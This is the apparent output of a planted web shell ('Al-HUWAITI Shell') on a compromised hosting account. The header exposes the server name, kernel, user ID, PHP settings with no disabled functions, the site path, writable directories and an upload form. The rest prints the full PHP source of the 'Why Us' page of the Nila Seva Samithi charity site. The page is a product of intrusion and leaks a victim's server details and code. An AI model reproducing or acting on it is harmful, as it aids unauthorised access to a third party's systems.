Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1949.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
User : u595547767 ( 595547767)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /home/u595547767/domains/nilasevasamithi.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u595547767/domains/nilasevasamithi.com/public_html/whyus.php
<?php
    include_once('admin/connect.php');
    session_start();
    $id=session_id();
    $_SESSION['sessionid']=$id;
?>

<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">
  <title>Why Us - Nila Seva Samithi</title>
  <meta name="description" content="">
  <meta name="keywords" content="">

  <!-- Favicons -->
  <link href="assets/img/favicon.png" rel="icon">
  <link href="assets/img/apple-touch-icon.png" rel="apple-touch-icon">

  <!-- Fonts -->
  <link href="https://fonts.googleapis.com" rel="preconnect">
  <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Raleway:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">

  <!-- Vendor CSS Files -->
  <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
  <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
  <link href="assets/vendor/aos/aos.css" rel="stylesheet">
  <link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">
  <link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">

  <!-- Main CSS File -->
  <link href="assets/css/main.css" rel="stylesheet">

  <!-- =======================================================
  * Template Name: Sailor
  * Template URL: https://bootstrapmade.com/sailor-free-bootstrap-theme/
  * Updated: Aug 07 2024 with Bootstrap v5.3.3
  * Author: BootstrapMade.com
  * License: https://bootstrapmade.com/license/
  ======================================================== -->
</head>

<body class="services-page">

    <header id="header" class="header sticky-top">

        <div class="topbar d-flex align-items-center dark-background">
          <div class="container d-flex justify-content-center justify-content-md-between">
            <div class="contact-info d-flex align-items-center">
              <i class="bi bi-envelope d-flex align-items-center"><a href="mailto:info@thannal.org">info@thannal.org</a></i>
              <i class="bi bi-phone d-flex align-items-center ms-4"><span>9447216144 / 04884285855</span></i>
            </div>
            <div class="social-links d-none d-md-flex align-items-center">
              <a href="#" class="twitter"><i class="bi bi-twitter-x"></i></a>
              <a href="#" class="facebook"><i class="bi bi-facebook"></i></a>
              <a href="#" class="instagram"><i class="bi bi-instagram"></i></a>
              <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a>
            </div>
          </div>
        </div><!-- End Top Bar -->
    
        <div class="branding">
    
          <div class="container position-relative d-flex align-items-center justify-content-between">
            <a href="index.php" class="logo d-flex align-items-center">
             
              <img src="assets/img/logo.png" alt="">
            </a>
    
            <nav id="navmenu" class="navmenu">
              <ul>
                <li><a href="index.php" class="active">Home</a></li>
                <li class="dropdown"><a href=""><span>About us</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                  <ul>
                    <li><a href="who-we-are.php">Who We Are</a></li>
                    <li><a href="whyus.php">Why Us</a></li>
                    <li><a href="Meet-our-team.php">Meet Our Team</a></li>
                  </ul>
                </li>
                <li class="dropdown"><a href="services.php"><span>Our Services</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                    <ul>
                 <?php
                  $selservice = mysqli_query($con,"SELECT * FROM tbl_services ORDER BY service_id ASC");
                  $i=1;
                  while($srow = mysqli_fetch_array($selservice)) {
                ?>
                  <li><a href="service_details.php?id=<?php echo  $srow['service_id']; ?>"><?php echo $srow['service_name']; ?></a></li>

                  <?php 
                   $i++;
                 }
                 ?>
              </ul>
                </li>
                <li class="dropdown"><a href="#"><span>Media</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                  <ul>
                    <li><a href="Media.php">Media</a></li>
                    <li><a href="News-Letter.php">News letter</a></li>
                    <li><a href="Events.php">Events</a></li>
                    <li><a href="Gallery.php">Gallery</a></li>
                  </ul>
                </li>
                <li class="dropdown"><a href=""><span>Reports</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                  <ul>
                    <li><a href="Annual-Reports.php">Annual Reports</a></li>
                    
                  </ul>
                </li>
                
                <li><a href="CSR.php">CSR</a></li>
                <li class="dropdown"><a href=""><span>Get Involved</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                  <ul>
                    <li><a href="Volunteer.php">Volunteer</a></li>
                      <li><a href="Internship.php">Internship</a></li>
                      <li><a href="Work-with-us.php">Work with us</a></li> 
                    
                  </ul>
                </li>
               
                <li><a href="contact.php">Reach out to us</a></li>
                <div class="donatenow"><a href="donate.php">Donate Now</a></div>
              </ul>
              <i class="mobile-nav-toggle d-xl-none bi bi-list"></i>
            </nav>
    
          </div>
    
        </div>
        
      </header>
      

  <main class="main ab">

    <!-- Page Title -->
    <div class="page-title light-background yus">
      <div class="container d-lg-flex justify-content-between align-items-center">
        <h1 class="mb-2 mb-lg-0">Why Us</h1>
        <nav class="breadcrumbs">
          <ol>
            <li><a href="index.php">Home</a></li>
            <li class="current">Why Us</li>
          </ol>
        </nav>
      </div>
    </div><!-- End Page Title -->


    <section class="whyus">
      <div class="container">
        
        </div>
        <div class="row">
          <div class="col-md-12">
             <?php
                  $selquote= mysqli_query($con,"SELECT * FROM tbl_quote ORDER BY quote_id ASC");
                  $i=1;
                  while($srowquote = mysqli_fetch_array($selquote)) {
                ?>
            <h1><?php echo $srowquote['quote_content']; ?></h1>
             <?php 
               $i++;
             }
             ?>
          </div>
        </div>
      </div>

    </section>
<section class="achivements">
  <div class="container">
    <div class="title-text">
      <h1>
        story of our achivements
      </h1>
      </div>
      
    <div class="row">
      <div class="col-md-12">
        <div class="swiper init-swiper">
          <script type="application/json" class="swiper-config">
            {
              "loop": true,
              "speed": 1600,
              "autoplay": {
                "delay": 15000
              },
              "slidesPerView": "auto",
              "pagination": {
                "el": ".swiper-pagination",
                "type": "bullets",
                "clickable": true
              },
              "breakpoints": {
                "320": {
                  "slidesPerView": 1,
                  "spaceBetween": 0
                },
                "480": {
                  "slidesPerView": 31,
                  "spaceBetween": 0
                },
                "640": {
                  "slidesPerView": 1,
                  "spaceBetween": 0
                },
                "992": {
                  "slidesPerView": 4,
                  "spaceBetween": 10
                }
              }
            }
          </script>
          <div class="swiper-wrapper align-items-center">
            <?php
                  $selachieve= mysqli_query($con,"SELECT * FROM tbl_achievement ORDER BY achieve_id ASC");
                  $i=1;
                  while($srowachieve = mysqli_fetch_array($selachieve)) {
            ?>
            <div class="swiper-slide">
              <div class="achiveimg">
                <img src="admin/<?php echo $srowachieve['achieve_image']; ?>" alt="">  
              </div>
              <div class="ac-text">
                <h4><?php echo $srowachieve['achieve_name']; ?></h4>
                <!--<h5>Professional Social Worker -->
                <!--</h5>-->
               
                <div  id="demo" class="collapse">
                  <p><?php echo $srowachieve['achieve_content']; ?> </p>
                 <!--  <p>Fundraiser(Smile Founder, Bangalore)- 2019 </p>
                  <p>Program Evaluation Associate - 2019</p>
                  <p>Program Evaluation officer- 2020
                    (STEM Learning pvt Ltd, Bangalore)
                    </p>
                    <p>Mental Health Service- Manager/ SPOC/ SW  - 2021  
                      (Tamahar Trust  Bangalore)
                      </p>
                      <p>Project coordinator- Karnikaram- 2024 (Nila Seva Samithi, Kerala)</p> -->
                </div>
                <button data-bs-toggle="collapse" data-bs-target="#demo" class="readbtn">Read more</button>
              </div>
            </div>
             <?php 
                  $i++;
                 }
            ?>
          </div>
          <!-- <div class="swiper-pagination"></div> -->
        </div>
      </div>
    </div>
  </div>

</section>
 <section  class="milestone">
      <h1 class="text-center"> Our Milestones</h1>
      
      <div class="container">
      <div class="row">
        <div class="col-md-2">
          <div class="mile">
            <div class="m-date">
              <img src="assets/img/milestone/2001.png" width="100%" alt="">
            </div>
            <div class="m-para">
              <p>Nila Seva Samithi was established as a charitable society with the primary objective of nurturing Bharatheeya culture in a dharmic way in our society. 
              </p>
            </div>
          </div>
        </div>
        <div class="col-md-2">
          <div class="mile m-tt">
            <div class="m-date">
              <img src="assets/img/milestone/2002.png" width="100%" alt="">
            </div>
            <div class="m-para">
              <p>Thanal Balashramam, Empowering girls 06 to 18 years of age and boys 06 to 10 years by providing a conducive environment to grow, study and achieve their full potential. </p>
            </div>
          </div>
        </div>
        <div class="col-md-2">
          <div class="mile">
            <div class="m-date">
              <img src="assets/img/milestone/2005.png" width="100%" alt="">

            </div>
            <div class="m-para">
              <p>Thanal Sisumandiram, Nurturing children below 6 years of age by providing the much-needed motherly care and attention. </p>
            </div>
          </div>
        </div>
        <div class="col-md-2">
          <div class="mile m-tt">
            <div class="m-date">
              <img src="assets/img/milestone/2005.png" width="100%" alt="">

            </div>
            <div class="m-para">
              <p>Nila Vidya Niketan (Since2005) - Lower Primary School with value added education to our children and children from surrounding. </p>
            </div>
          </div>
        </div>
        <div class="col-md-2">
          <div class="mile">
            <div class="m-date">
              <img src="assets/img/milestone/2007.png" width="100%" alt="">

            </div>
            <div class="m-para">
              <p>Sree Vilwadrinatha Sevashramam, Care and protection of boys between   6 - 18 years and providing a secure and loving home for the holistic development.
              </p>
            </div>
          </div>
        </div>
        <div class="col-md-2">
          <div class="mile m-tt">
            <div class="m-date">
              <img src="assets/img/milestone/2018.png" width="100%" alt="">

            </div>
            <div class="m-para">
              <p>Thanal Mathrusadanam, we provide safe shelter, legal protection, food, clothing, healthcare and medical assistance to women over 55 who have been abandoned, marginalized and neglected by their families.
              </p>
            </div>
          </div>
        </div>
        <div class="col-md-2">
          <div class="mile">
            <div class="m-date">
              <img src="assets/img/milestone/2018.png" width="100%" alt="">

            </div>
            <div class="m-para">
              <p>Pain And Palliative Care, enhance the quality of life of individuals who are bedridden by providing comprehensive pain management and symptom relief. Our focus is on addressing the physical, emotional, and psychological needs of patients and their families through compassionate patient-care. 
              </p>
            </div>
          </div>
        </div>
        <div class="col-md-2">
          <div class="mile m-tt">
            <div class="m-date">
              <img src="assets/img/milestone/2019.png" width="100%" alt="">

            </div>
            <div class="m-para">
              <p>Thanal Domestic violence shelter home, we support and protect women survivors by addressing their immediate and long-term needs
              </p>
            </div>
          </div>
        </div>
        <div class="col-md-2">
          <div class="mile">
            <div class="m-date">
              <img src="assets/img/milestone/2022.png" width="100%" alt="">

            </div>
            <div class="m-para">
              <p>Thanal Women in Distress, we provide comprehensive and compassionate care to women who are below 55 years experienced emotional, physical and social distress and also providing free legal aid support under the service providing centre. 
              </p>
            </div>
          </div>
        </div>
        <div class="col-md-2">
          <div class="mile m-tt">
            <div class="m-date">
              <img src="assets/img/milestone/2025.png" width="100%" alt="">

            </div>
            <div class="m-para">
              <p>Karnikaram, Village for Special Needs, We aim to Uplift the life of Differently  abled individuals through the therapeutic service and skill development training to make them independent throughout their life in society.</p>
            </div>
          </div>
        </div>
      </div>
    </div>
    </section>
   
  </main>
   <?php
    include_once('footer.php');
  ?>
 

Al-HUWAITI Shell